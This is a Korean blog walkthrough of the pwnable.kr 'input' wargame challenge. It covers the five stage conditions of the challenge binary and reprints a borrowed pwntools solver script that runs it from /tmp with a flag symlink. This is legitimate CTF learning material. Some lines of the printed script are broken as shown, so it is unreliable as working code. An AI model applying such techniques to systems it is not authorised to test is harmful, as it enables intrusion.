Input문제풀이

by

Input-문제풀이.gif
img_3459497_3424_8_garam1117.gif
1113856102_BGM-yih727-siseee.gifMermaid Melody Pichi Pichi Pitch Pure Rina Song
img_3459497_3424_8_garam1117.gif

난이도가 상당합니다 ōxō

익스플로잇 같은 경우

외부 다른 분 익스플로잇

을 참고했습니다.

소켓 프로그래밍으로

추정되는데 마치 집에

나뒹구는 오래된

소켓 프로그래밍 책

이랑 참고해야겠습니다.

aaW.png

김종성

001.png
스샷.1

역시 마이웨이 직역으로 지문은 다음과 같습니다.

Mom? how can I pass my input to a computer program?

(으따 입력 내용을 컴퓨터 프로그램에다 으따 전달해야 되나?)

002.png

스샷.2

그럼 바로 접속해봅니다.

ssh input2@pwnable.kr -p2222 (pw:guest)

그리고 역시 ls를 입력해보면

파일이 총 3개가 보입니다.

그리고

cat 명령어로

input.c

을 확인해봅니다.

003.png

스샷.3

엌ㅋㅋㅋㅋㅋㅋ

이번 소스코드는

매우 깁니다ōxō

매우 깁니다ōxō

전체적으로 보았을 때 Stage1을

통과하기 위한 조건을 봅시다.

: )

argv부분.png

코드.1

 1. 인자의 개수 = 100

2. argv[‘A’] = \x00

3. argv[‘B’] = \x20\x0a\x0d

이면 스테이지 1이 완료돼갑니다.

stdio부분.png

코드.2

스테이지 2입니다.
stdin으로 \x00\x0a\x00\xff
입력을 주고
sterr로
\x00\x0a\x02\xff을

주어야 완료가 됩니다.

env부분.png

코드.3

stage 3입니다.
환경 변수입니다
\xde\xad\xbe\xef라는
환경 변수에
\xca\xfe\xba\xbe
값을 넣어주면
됩니다.
file부분.png

코드.4

Stage 4입니다.
\x0a라는 파일을 열고,
읽어온 첫 4바이트가
\x00\x00\x00\x00

이어야 완료가 됩니다.

network.png

코드.5

stage 5입니다.
atoi(argv[‘C’]) = argv[‘C’]
의 정수형으로 변화한 값을
포트 번호로
소켓 서버를 열고

\xde\xad\xbe\xef

을 보내주면

stage5가 완료됩니다.

그럼 익스플로잇 시도하겠습니다.

아직 직접 짜는 실력은 없어

이 분의 익스플로잇 코드

를 참고하겠습니다

Python으로 작성

되었습니다.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
from pwn import *
prog = []
prog.append(“/home/input2/input”)
#prog.append(“./test”)
for i in range(99):
    prog.append(“A”)
prog[ord(“A”)]=“”
prog[ord(‘B’)]=“\x20\x0a\x0d”
prog[ord(‘C’)]=“35790”
conn = process(prog, stderr=open(“stderr”,‘r’), env={“\xde\xad\xbe\xef”:“\xca\xfe\xba\xbe”})
print(conn.recvuntil(“Stage 1 clear!”))
= open(“\x0a”,‘w’)
f.write(“\x00\x00\x00\x00”)
f.close()
conn.sendline(“\x00\x0a\x00\xff”)
print(conn.recvuntil(“Stage 4 clear!”))
#sleep(3)
reconn = remote(“127.0.0.1”35790)
reconn.send(“\xde\xad\xbe\xef”)
reconn.close()
print(conn.recvline())
print(conn.recvall())
conn.interactive()
 cs
코드. 6

허나 이 코드는 현 디렉터리에는

사용할 수가 없습니다.

권한이 없기 때문…。

그래서 권한이 있는 /tmp

를 이용해야 한다고

합니다.

그럼 /tmp에서

진행해보겠습니다.

그리고 앞서 깜빡하고

스크린샷 찍어두는 게 빠졌는데

그양 실행하면 플래그 파일이

없다면서

플래그가 뜨지를 않아

ln -s /home/input2/flag flag

이렇게 심블릭을 걸어주고

시도를 해야 합니다.

그럼 이제 심블릭을 걸어두고

진행을 하면

004(死).png
스샷.4

잠시 후에 민트색으로

그 여진 부분이

키값입니다. 😀

이렇게

받아챙긴 키값으로

005.png
스샷.5

처음 화면으로 돌아와서

빈칸에 입력하고

auth 버튼을 누르면 됩니다.

006.png

그리고 미션이 완료된 동시에

4포인트 받아챙기고

007.png

그리고 돌아와보면 이렇게

풀었다는 뜻으로 녹색 점선으로

표시가 되었습니다.

긴 글을 보시느라 감사합니다.

수고하셨습니다: )

aaW.png

좋은 하루 되시고 하시는 일 잘 되시고

날이 덥습니다 더위 먹지 않게 유의하시고

코로나 조심하세요 : )

오늘도_좋은_하루.png

#pwnable_kr , #pwnablekr ,#웹해킹 , #해킹 , #실습 , #input , #Input ,
#모의해킹 , #나오마리오타프라데이리 , #ōxō , #oxo, #콧코로 ,
#콩코로 , #콩 , #콩진호 , #홍진호 , #kokkoro , #コッコロ , #어_왜_두번_써지지,
#피치피치핏치 , #Mermaid_Melody , #ぴちぴちピッチ, #네오아카데미, #코로나